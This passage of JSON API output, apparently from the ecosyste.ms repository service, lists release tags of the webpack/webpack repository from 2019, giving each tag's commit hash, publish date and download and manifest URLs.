https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencie